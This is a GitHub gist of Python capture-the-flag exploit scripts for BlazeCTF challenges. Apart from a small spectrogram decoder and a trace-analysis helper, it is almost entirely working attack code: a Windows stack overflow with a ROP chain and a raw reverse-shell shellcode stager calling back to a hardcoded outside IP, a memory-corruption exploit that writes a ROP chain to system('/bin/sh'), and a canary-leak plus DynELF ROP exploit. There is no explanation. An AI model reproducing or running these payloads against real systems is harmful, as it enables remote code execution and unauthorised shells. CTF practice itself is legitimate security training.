Last active
June 5, 2018 05:44
-
-
Save Jinmo/2422626e891a4ebb97ec92200d8469c7 to your computer and use it in GitHub Desktop.
blazectf exploits (still uploading)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# spectogram | |
s = '''1100110101100111111111011101111111011110110010001 | |
0011001010011111111000100010000000100001001101111 | |
1010001000110000101011101011101011110101111110111 | |
0100010001010010101111011101100110001100000000111 | |
1000111100000010010010111010111111010110100000011 | |
0010100100110100101011011001110111000110010110110 | |
0010000101100001011111001000101011100100101101001'''.split('\n') | |
print ''.join([chr(int(''.join([s[j][i] for j in range(7)]),2)) for i in range(len(s[0]))]) | |
print len(s[0]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
import socket | |
import time | |
import hexdump | |
from pwn import * | |
p32 = lambda x: struct.pack("<L", x) | |
u32 = lambda x: struct.unpack("<L", x)[0] | |
HOST, PORT = '192.168.137.153', 42069 | |
HOST, PORT = 'hotbox.420blaze.in', 42071 | |
go = lambda: socket.create_connection((HOST, PORT)) | |
h = 0x1b0 | |
for i in range(16): | |
sc = go() | |
sc.send('a' * 0xc4 + p32(0) + p32(0x40176a)) | |
time.sleep(0.3) | |
sc = go() | |
sc.send('a' * 0xc4 + p32(0) + p32(0x40152f) * 3 + p32(0x4016d0)) | |
sp = u32(sc.recv(4)) | |
print hex(sp) | |
def create_rop_chain(): | |
# rop chain generated with mona.py - www.corelan.be | |
rop_gadgets = [ | |
0x77bb208a, # POP ECX # RETN [msvcrt.dll] | |
0x77ba1100, # ptr to &VirtualAlloc() [IAT msvcrt.dll] | |
0x0040528a, # MOV EAX,DWORD PTR DS:[ECX] # RETN [blazectf-1.exe] | |
0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] | |
0x004058cd, # POP EBP # RETN [blazectf-1.exe] | |
0x77eb4303, # & call esp [kernel32.dll] | |
0x77bd7031, # POP EBX # RETN [msvcrt.dll] | |
0x00000001, # 0x00000001-> ebx | |
0x0040f913, # POP EDX # RETN [blazectf-1.exe] | |
0x00001000, # 0x00001000-> edx | |
0x77bbdee3, # POP ECX # RETN [msvcrt.dll] | |
0x00000040, # 0x00000040-> ecx | |
0x0040584b, # POP EDI # RETN [blazectf-1.exe] | |
0x77bda010, # RETN (ROP NOP) [msvcrt.dll] | |
0x77bc5d88, # POP EAX # RETN [msvcrt.dll] | |
0x90909090, # nop | |
0x7c82e243, # PUSHAD # RETN [ntdll.dll] | |
] | |
return ''.join(struct.pack('<I', _) for _ in rop_gadgets) | |
rop_chain = create_rop_chain() | |
time.sleep(2) | |
sc = go() | |
shcode = asm( | |
''' | |
sub esp, 0x800 | |
mov eax, [0x411108] | |
push esp | |
push 0x202 | |
call eax | |
mov eax, [0x411128] | |
push 0 | |
push 1 | |
push 2 | |
call eax | |
mov edi, eax | |
mov esi, esp | |
add esp, 0x100 | |
push 0 | |
push 0 | |
push 0 | |
push 0x55a40002 | |
mov ebp, esp | |
mov esp, esi | |
push 0x10 | |
push ebp | |
push edi | |
mov eax, [0x411114] | |
call eax | |
push 5 | |
push edi | |
mov eax, [0x41111c] | |
call eax | |
push ebp | |
add dword ptr [esp], -4 | |
mov dword ptr [ebp-4], 16 | |
push ebp | |
push edi | |
mov eax, [0x411110] | |
call eax | |
mov edi, eax | |
push 0 | |
push 0x100 | |
push ebp | |
push edi | |
mov eax, [0x411124] | |
call eax | |
''' | |
) | |
buf = "" | |
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" | |
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" | |
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" | |
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" | |
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" | |
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" | |
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" | |
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" | |
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" | |
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" | |
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" | |
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff" | |
buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" | |
buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\x0d\xe6\xbc\x50\x68\x02" | |
buf += "\x00\x7a\x69\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" | |
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68" | |
buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08" | |
buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57" | |
buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" | |
buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" | |
buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" | |
buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" | |
buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" | |
buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" | |
buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" | |
buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" | |
buf += "\x53\xff\xd5" | |
sc.send('a' * 0xc4 + p32(0) + rop_chain + shcode + buf) | |
time.sleep(1) | |
while True: | |
sc = go() | |
print `sc.recv(0x100)` | |
print 'yey.' | |
exit() | |
try: | |
leak = sc.recv(0x100) | |
if leak: | |
exit() | |
except: | |
pass | |
sc.close() | |
print hex(sp) | |
print hex(h) | |
hexdump.hexdump(leak) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from capstone import * | |
import struct | |
regs = 'ESP, EAX, ECX, EDX, EBX, WHAT, EBP, ESI, EDI'.split(', ')[::-1] | |
strings = ['AAAAaaaaCAAA q31EAAAFAAAGAAAHAAATu31', 'baaacaaadaaaeaaafaaagaaahaaa\x00\x00\x00baaaa', 'baaaaaaaCAAA q31EAAAFAAAGAAAHAAAXu31', 'caaadaaaeaaafaaagaaahaaa\x00\x00\x00baaacaaaC', 'baaacaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaacaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaabaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaabaaaDAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'daaabaaaDAAA q31EAAAFAAAGAAAHAAA`u31', 'eaaafaaagaaahaaa\x00\x00\x00daaabaaaDAAA q31E', 'daaabaaaDAAA q31EAAAGAAAGAAAHAAA`u31', 'eaaafaaagaaahaaa\x00\x00\x00daaabaaaDAAA q31E', 'daaabaaaDAAA q31EAAAGAAAeaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'daaabaaaDAAA q31EAAAGAAAeaaaHAAA`u31', 'du31faaagaaahaaa\x00\x00\x00daaabaaaEAAA q31E', 'daaabaaaEAAA q31EAAAGAAAeaaaHAAA`u31', 'du31faaagaaahaaa\x00\x00\x00daaabaaaEAAA q31E', 'du31baaaEAAA q31EAAAGAAAeaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31baaaEAAA q31EAAAGAAAdaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAA`u31', 'EAAAfaaagaaahaaa\x00\x00\x00du31aaaaEAAA q31E', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAA\\u31', '`u31EAAAfaaagaaahaaa\x00\x00\x00du31aaaaEAAA ', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAAXu31', 'GAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31aaaaE', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'du31aaaaEAAA q31FAAAGAAAdaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'du31aaaaEAAA q31FAAAGAAAdaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'du31aaaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'cu31aaaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'cu31`aaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'Tu31`aaaEAAA q31FAAAGAAAcaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'Tu31aaaaEAAA q31FAAAGAAAcaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'Tu31aaaaEAAA q31FAAAGAAAcaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', 'Tu31aaaaEAAA q31FAAAGAAAdaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', 'Uu31aaaaEAAA q31FAAAGAAAdaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', '1EAAaaaaEAAA q31FAAAGAAAdaaaHAAAWu31', 'AGAAA`u31EAAAfaaagaaahaaa\x00\x001EAAaaaaE', '1EAAaaaaEAAA q31FAAAGAAAcaaaHAAAWu31', 'AGAAA`u31EAAAfaaagaaahaaa\x00\x001EAAaaaaE', '1EAAaaaaEAAA q31FAAAAGAAcaaaHAAA[u31', 'A`u31EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA ', 'A`u3aaaaEAAA q31FAAAAGAAcaaaHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAcaaaHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAcaaaHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAAZu31', 'GAAA31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA ', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAAVu31', 'GAAAGAAA31EAAAfaaagaaahaaa\x00A`u3aaaaE', 'A`u3aaaaEAAA q31GAAAAGAAGAAAHAAAZu31', 'GAAA31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA ', 'GAAAaaaaEAAA q31GAAAAGAAGAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAAaaaaEAAA q31GAAAAGAAHAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAA`aaaEAAA q31GAAAAGAAHAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAA`aaaEAAA q31GAAAAGAAHAAAHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', '1EAA`aaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', '1EAAaaaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', '1EAAaaaaEAAA q31GAAAAGAAHAAAHAAA_u31', 'EAAAAfaaagaaahaaa\x00\x001EAA`aaaEAAA q31G', '1EAA`aaaEAAA q31GAAAAGAAHAAAHAAA_u31', 'EAAAAfaaagaaahaaa\x00\x001EAA`aaaEAAA q31G', 'EAAA`aaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', 'EAAA`aaaEAAA q31GAAABGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', 'EAAA`aaaAfaa q31GAAABGAAHAAAHAAAgu31', 'agaaahaaa\x00%255s\x00A problem with mmap '] | |
def to_regs(x): | |
x = struct.unpack("<9L", x) | |
y = {} | |
for reg, value in zip(regs, x): | |
y[reg] = value | |
return y | |
cs = Cs(CS_ARCH_X86, CS_MODE_32) | |
for i in range(64, 96): | |
dis = cs.disasm(chr(i) * 100, 0x3133700c).next() | |
print dis.mnemonic + ' ' + dis.op_str, '/', | |
print 'end' | |
def diff(x, y, prevStack, stack): | |
X = x | |
Y = y | |
diffs = {} | |
for a in y: | |
if y[a] != x[a]: | |
# print a, '%08x'%x[a], '->', '%08x'%y[a] | |
diffs[a] = x[a], y[a] | |
if len(diffs.keys()) == 1 and diffs.keys()[0] in regs: | |
x, y = diffs.values()[0] | |
if abs(x-y) == 1: | |
print {-1: 'dec', 1: 'inc'}[y - x] + ' ' + diffs.keys()[0] | |
elif abs(x-y) == 4: | |
if x > y: | |
print 'PUSH', | |
#print `prevStack` | |
#print `stack` | |
found = 0 | |
for a, b in X.items(): | |
if b == struct.unpack("<L", stack[:4])[0]: | |
print a, | |
found = 1 | |
if found == 0: | |
print '?' | |
else: | |
print 'POP EAX' | |
else: | |
print 'wtf' | |
exit() | |
elif 'ESP' in diffs: | |
assert x['ESP'] + 4 == y['ESP'] | |
print 'pop', filter(lambda x: x != 'ESP', diffs.keys()) | |
else: | |
print 'INC EAX' | |
prev = initial = to_regs("AAAABAAACAAADAAAEAAAFAAAGAAAHAAAPu31") | |
base = initial['ESP'] | |
print '%x' % initial['ESP'] | |
prevStack = "aaaabaaacaaadaaaeaaafaaagaaahaaa" | |
for i in range(0, len(strings), 2): | |
cur = to_regs(strings[i]) | |
stack = strings[i+1] | |
diff(prev, cur, prevStack, stack) | |
prev = cur | |
prevStack = stack | |
# print '-' * 80 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
HOST, PORT = "vectors.420blaze.in", "420" | |
# HOST, PORT = "192.168.137.154", 31337 | |
libc = ELF('/=/Downloads2/_libc.so.6') | |
class V(object): | |
def __init__(self): | |
self.r = remote(HOST, PORT) | |
self.menu = lambda: self.r.recvuntil("> ") | |
self.prompt = lambda: self.r.recvuntil('? ') | |
self.ii = lambda x: self.r.sendline(str(x)) | |
self.verbose = True | |
def push(self, vec, value): | |
self.ii('push') | |
self.ii(vec) | |
self.ii(value) | |
self.menu() | |
self.prompt() | |
self.prompt() | |
self.update_address() | |
def write(self, vec, index, value): | |
self.ii('write') | |
self.ii(vec) | |
self.ii(index) | |
self.ii(value) | |
self.menu() | |
self.prompt() | |
self.menu() | |
self.prompt() | |
self.update_address() | |
def read(self, vec, index): | |
self.ii('read') | |
self.ii(vec) | |
self.ii(index) | |
self.menu() | |
self.prompt() | |
self.menu() | |
self.r.recvuntil(' == ') | |
result = int(self.r.recvline()) | |
self.update_address() | |
return result | |
def update_address(self): | |
lines = self.r.recvuntil('\nread', drop=True).strip().split('\n') | |
if self.verbose: | |
print '\n'.join(lines) | |
lines = [eval(x) for x in lines] | |
self.entries = lines | |
r1 = V() | |
r2 = V() | |
r1.push(0, 0) | |
time.sleep(1) | |
r2.ii('write') | |
r2.ii('0') | |
r2.ii('0') | |
r2.menu() | |
r2.prompt() | |
r2.menu() | |
r2.prompt() | |
# r2.r.interactive() | |
# then wait | |
for i in range(32): | |
r1.push(0, 0) | |
base = r1.entries[1][0] - 0x120 | |
r2.ii(base) | |
ld = base - 0x21f000 | |
r1.verbose = False | |
@MemLeak | |
def leak(x): | |
if x % 8: | |
return | |
idx = (x - base) / 8 | |
idx &= 2 ** 64 - 1 | |
return p64(r1.read(0, idx)) | |
# r2.ii(0x41414141) | |
r1.write(0, 0, 2**64-1) | |
assert r1.entries[0][1] == 2 ** 64 - 1 | |
r2.r.close() | |
pause() | |
libc.address = base - 0xe28000 | |
stack = leak.q(libc.symbols['__environ']) | |
vs = [] | |
while True: | |
v = leak.q(stack) | |
vs.append(v) | |
if len(vs) >= 3: | |
if vs[-1] & 0xfff == 0xba3 and vs[-3] & 0xfff == 0xed8: | |
print hex(stack) | |
break | |
stack -= 8 | |
x = stack | |
rop = [ | |
libc.search('\x5f\xc3').next(), | |
libc.search('/bin/sh\x00').next(), | |
libc.symbols['system'] | |
] | |
for i in range(len(rop)): | |
idx = (x - base) / 8 | |
x += 8 | |
r1.write(0, idx, rop[i]) | |
r1.ii('yo') | |
r1.r.interactive() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import textwrap | |
import ctypes | |
libc = ctypes.CDLL('libc.so.6') | |
HOST, PORT = "waldo.420blaze.in", "420" | |
# HOST, PORT = "0.0.0.0", 31337 | |
r = remote(HOST, PORT) | |
menu = lambda: r.recvuntil("? ") | |
ii = lambda x: r.sendline(str(x)) | |
def genwaldo(): | |
pos = libc.rand() % 17 | |
w = 2 * (pos + 8) | |
h = pos + 8 | |
pos = libc.rand() % (w * h) | |
return pos / w, pos % w | |
canary = None | |
def recvwaldo(recv=False): | |
global canary, stack, base | |
r.recvline() | |
data = r.recvuntil('\nWaldo\'s found', drop=True) | |
for i in range(8, 100): | |
lines = data[i::i+1] | |
if lines.strip('\n') == '': | |
break | |
width = i | |
realdata = '' | |
for i in range(len(data) / width): | |
realdata += data[(width+1)*i:][:width] | |
pos = realdata.find('W') | |
if recv: | |
realdata = realdata[0:][:32] | |
canary = realdata[8:16] | |
stack = u64(realdata[16:24]) | |
base = u64(realdata[24:32]) - 0xc43 | |
print hex(base) | |
print canary.encode('hex') | |
print `realdata` | |
return width | |
menu() | |
ii('y') | |
libc.srand(libc.time(0)) | |
print recvwaldo() | |
genwaldo() | |
ii('a') | |
cnt = 2000 | |
# cnt = 0 | |
menu() | |
ii('y' + 'a' * cnt) | |
menu() | |
recvwaldo(True) | |
a, b = genwaldo() | |
ii(a) | |
ii(b) | |
for i in range(31): | |
a, b = genwaldo() | |
ii(a) | |
ii(b) | |
r.recvuntil('name:') | |
poprdi = base + 0x1113 | |
stack += 0x100 | |
framesize = 0x400 | |
def leak(addr): | |
global stack | |
if '\n' in p64(addr): | |
return | |
payload = '\x00'.rjust(72, '\x00') + canary + p64(stack + 0x100) + p64(poprdi) + p64(addr) + p64(base + 0x998) + p64(poprdi) + p64(base + 0x12b0) + p64(base + 0x998) + p64(base + 0x1056) | |
stack -= framesize | |
ii(payload) | |
r.recvuntil('Congratz !\n') | |
data = r.recvuntil('\nTop score', drop=True) + '\x00' | |
print `data` | |
return data | |
d = DynELF(leak, base, elf=ELF('waldo')) | |
system = d.lookup('system', 'libc') | |
print hex(system) | |
payload = 'sh # '.rjust(72) + canary + p64(stack) + p64(poprdi) + p64(stack + framesize + 0x4a0 - 0x380) + p64(system) + 'sh\x00' | |
ii(payload) | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment